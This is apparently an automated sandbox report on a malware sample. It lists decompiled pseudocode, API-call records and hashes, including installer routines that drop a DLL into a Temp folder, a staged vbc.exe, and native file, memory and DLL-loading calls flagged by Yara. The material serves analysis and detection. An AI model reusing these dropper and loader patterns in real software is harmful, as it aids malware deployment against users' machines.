                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: dR@
                                          • API String ID: 3213498283-1322173608
                                          • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                          • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                          • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                          • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E00401D1B() {
                                          				void* __esi;
                                          				int _t6;
                                          				signed char _t11;
                                          				struct HFONT__* _t14;
                                          				void* _t18;
                                          				void* _t24;
                                          				void* _t26;
                                          				void* _t28;
                                          
                                          				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                          				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                                          				 *0x40af8c = E004029CB(3);
                                          				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                          				 *0x40af93 = 1;
                                          				 *0x40af90 = _t11 & 0x00000001;
                                          				 *0x40af91 = _t11 & 0x00000002;
                                          				 *0x40af92 = _t11 & 0x00000004;
                                          				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
                                          				_t14 = CreateFontIndirectA(0x40af7c);
                                          				_push(_t14);
                                          				_push(_t26);
                                          				E00405889();
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
                                          				return 0;
                                          			}












                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirect
                                          • String ID:
                                          • API String ID: 3272661963-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: (%p) %s %p %p$(%p) Unhandled Sink: %s
                                          • API String ID: 2931989736-219090540
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                          				long _t22;
                                          
                                          				if(_a8 != 0x102) {
                                          					if(_a8 != 0x200) {
                                          						_t22 = _a16;
                                          						L7:
                                          						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
                                          							 *0x429fc0 = _t22;
                                          							E0040592B(0x429fd8, 0x42f000);
                                          							E00405889(0x42f000, _t22);
                                          							E0040140B(6);
                                          							E0040592B(0x42f000, 0x429fd8);
                                          						}
                                          						L11:
                                          						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
                                          					}
                                          					if(IsWindowVisible(_a4) == 0) {
                                          						L10:
                                          						_t22 = _a16;
                                          						goto L11;
                                          					}
                                          					_t22 = E00404598(_a4, 1);
                                          					_a8 = 0x419;
                                          					goto L7;
                                          				}
                                          				if(_a12 != 0x20) {
                                          					goto L10;
                                          				}
                                          				E00403D29(0x413);
                                          				return 0;
                                          			}





                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404C4F
                                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404CBD
                                            • Part of subcall function 00403D29: SendMessageA.USER32 ref: 00403D3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • unsupported interface: %s, xrefs: 10002F65
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: unsupported interface: %s
                                          • API String ID: 2931989736-1937909893
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • unsupported interface: %s, xrefs: 10002C05
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: unsupported interface: %s
                                          • API String ID: 2931989736-1937909893
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                          				int _t5;
                                          				long _t7;
                                          				struct _OVERLAPPED* _t11;
                                          				intOrPtr* _t15;
                                          				void* _t17;
                                          				int _t21;
                                          
                                          				_t15 = __esi;
                                          				_t11 = __ebx;
                                          				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                          					_t7 = lstrlenA(E004029E8(0x11));
                                          				} else {
                                          					E004029CB(1);
                                          					 *0x409f78 = __al;
                                          				}
                                          				if( *_t15 == _t11) {
                                          					L8:
                                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                                          				} else {
                                          					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll", _t7, _t17 + 8, _t11);
                                          					_t21 = _t5;
                                          					if(_t21 == 0) {
                                          						goto L8;
                                          					}
                                          				}
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
                                          				return 0;
                                          			}










                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll,00000000,?), ref: 004024ED
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll, xrefs: 004024BC, 004024E1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FileWritelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll
                                          • API String ID: 427699356-4212537918
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405465(char* _a4) {
                                          				char* _t3;
                                          				char* _t5;
                                          
                                          				_t5 = _a4;
                                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                                          				while( *_t3 != 0x5c) {
                                          					_t3 = CharPrevA(_t5, _t3);
                                          					if(_t3 > _t5) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				 *_t3 =  *_t3 & 0x00000000;
                                          				return  &(_t3[1]);
                                          			}






                                          APIs
                                          • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402C77,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 0040546B
                                          • CharPrevA.USER32(80000000,00000000), ref: 00405479
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\Public
                                          • API String ID: 2709904686-2272764151
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405577(CHAR* _a4, CHAR* _a8) {
                                          				int _t10;
                                          				int _t15;
                                          				CHAR* _t16;
                                          
                                          				_t15 = lstrlenA(_a8);
                                          				_t16 = _a4;
                                          				while(lstrlenA(_t16) >= _t15) {
                                          					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                          					_t10 = lstrcmpiA(_t16, _a8);
                                          					if(_t10 == 0) {
                                          						return _t16;
                                          					}
                                          					_t16 = CharNextA(_t16);
                                          				}
                                          				return 0;
                                          			}







                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                          • CharNextA.USER32(00000000), ref: 004055A5
                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 2738559852-782607585
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                          				intOrPtr _t17;
                                          				void* _t18;
                                          				intOrPtr _t22;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          				intOrPtr* _t28;
                                          
                                          				_t13 = _a4;
                                          				_t28 = _a4 + 0xc48;
                                          				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                          				_t4 =  &_a40; // 0x414a31
                                          				_t6 =  &_a32; // 0x414d72
                                          				_t17 = _a12;
                                          				_t12 =  &_a8; // 0x414d72
                                          				_t22 =  *_t12;
                                          				_t26 =  *_t28;
                                          				_t18 =  *_t26(_t22, _t17, ss, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                          				return _t18;
                                          			}










                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 2738559852-782607585
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0041A45A(void* __eax, void* __ecx, intOrPtr* __edx) {
                                          				void* _t2;
                                          
                                          				_push(ss);
                                          				_t2 =  *__edx(); // executed
                                          				return _t2;
                                          			}





                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: rMA
                                          • API String ID: 2738559852-3963102562
                                          • Opcode ID: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction ID: a17aa2240b27da952f6d4e846a73025c83d008a0d1fc895a59b0a4c2578875c1
                                          • Opcode Fuzzy Hash: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction Fuzzy Hash: 27A002BE15921478692472B53C15CFA560CC4C43B53114967F50D80410446BD8A51176
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040ACF0(void* _a4, intOrPtr _a8) {
                                          				char* _v8;
                                          				struct _EXCEPTION_RECORD _v12;
                                          				struct _OBJDIR_INFORMATION _v16;
                                          				char _v536;
                                          				void* _t15;
                                          				struct _OBJDIR_INFORMATION _t17;
                                          				struct _OBJDIR_INFORMATION _t18;
                                          				void* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          
                                          				_v8 =  &_v536;
                                          				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                          				_t31 = _t30 + 0xc;
                                          				if(_t15 != 0) {
                                          					_t17 = E0041D070(__eflags, _v8);
                                          					_t32 = _t31 + 4;
                                          					__eflags = _t17;
                                          					if(_t17 != 0) {
                                          						E0041D2F0( &_v12, 0);
                                          						_t32 = _t32 + 8;
                                          					}
                                          					_t18 = E0041B4A0(_v8);
                                          					_v16 = _t18;
                                          					__eflags = _t18;
                                          					if(_t18 == 0) {
                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                          						return _v16;
                                          					}
                                          					return _t18;
                                          				} else {
                                          					return _t15;
                                          				}
                                          			}














                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                          				long _t21;
                                          				void* _t31;
                                          
                                          				_t3 = _a4 + 0xc40; // 0xc40
                                          				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                          				return _t21;
                                          			}






                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				long _t14;
                                          				void* _t21;
                                          
                                          				_t3 = _a4 + 0xc60; // 0xca0
                                          				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t14;
                                          			}






                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A490(intOrPtr _a4, void* _a8) {
                                          				long _t8;
                                          				void* _t11;
                                          
                                          				_t5 = _a4;
                                          				_t2 = _t5 + 0x10; // 0x300
                                          				_t3 = _t5 + 0xc50; // 0x40a943
                                          				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                          				_t8 = NtClose(_a8); // executed
                                          				return _t8;
                                          			}






                                          APIs
                                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
